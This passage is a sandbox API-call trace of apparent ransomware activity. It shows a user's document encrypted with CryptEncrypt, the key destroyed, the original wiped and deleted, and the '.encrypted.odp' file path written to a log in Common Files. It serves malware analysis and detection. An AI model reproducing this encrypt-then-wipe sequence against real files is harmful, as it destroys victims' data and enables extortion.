[0033.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.542] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b5c60*, pdwDataLen=0x6ae220*=0x2e41, dwBufLen=0x2e50 | out: pbData=0x8b5c60*, pdwDataLen=0x6ae220*=0x2e50) returned 1 [0033.542] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.548] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.548] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.548] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.548] CryptDestroyKey (hKey=0x7c2200) returned 1 [0033.548] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.548] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.548] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.549] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.549] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0033.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.549] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0033.550] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0033.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.550] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fbb0ee0, ftCreationTime.dwHighDateTime=0x1d5bd99, ftLastAccessTime.dwLowDateTime=0xb9c3ef0, ftLastAccessTime.dwHighDateTime=0x1d5bf47, ftLastWriteTime.dwLowDateTime=0xb9c3ef0, ftLastWriteTime.dwHighDateTime=0x1d5bf47, nFileSizeHigh=0x0, nFileSizeLow=0x2e41, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Htr5Pk.odp", cAlternateFileName="")) returned 0x7c2100 [0033.551] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.551] CharLowerBuffW (in: lpsz="byte[11841]", cchLength=0xb | out: lpsz="byte[11841]") returned 0xb [0033.551] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.551] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.551] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.551] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.552] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.552] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.552] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\htr5pk.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0033.552] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.553] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.553] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.553] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.553] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.553] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.553] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp", lpFilePart=0x0) returned 0x4e [0033.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fbb0ee0, ftCreationTime.dwHighDateTime=0x1d5bd99, ftLastAccessTime.dwLowDateTime=0xb9c3ef0, ftLastAccessTime.dwHighDateTime=0x1d5bf47, ftLastWriteTime.dwLowDateTime=0x13e26c40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x2e41, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Htr5Pk.odp", cAlternateFileName="")) returned 0x7c2100 [0033.554] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\htr5pk.odp")) returned 1 [0033.555] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fbb0ee0, ftCreationTime.dwHighDateTime=0x1d5bd99, ftLastAccessTime.dwLowDateTime=0xb9c3ef0, ftLastAccessTime.dwHighDateTime=0x1d5bf47, ftLastWriteTime.dwLowDateTime=0x13e26c40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x2e41, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Htr5Pk.odp", cAlternateFileName="")) returned 0 [0033.555] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.555] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.555] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.555] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.556] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.556] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.556] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.556] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.556] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.556] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.556] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.557] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.557] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.557] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.557] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.557] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x10aa, lpOverlapped=0x0) returned 1 [0033.557] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.557] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x10aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.558] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0033.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.encrypted.odp\r\n", cchWideChar=91, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 91 [0033.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5b) returned 0x87aa40 [0033.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.encrypted.odp\r\n", cchWideChar=91, lpMultiByteStr=0x87aa40, cbMultiByte=91, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.encrypted.odp\r\n", lpUsedDefaultChar=0x0) returned 91 [0033.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0033.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0033.558] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x5a, lpOverlapped=0x0) returned 1 [0033.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0033.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.558] CloseHandle (hObject=0x140) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: 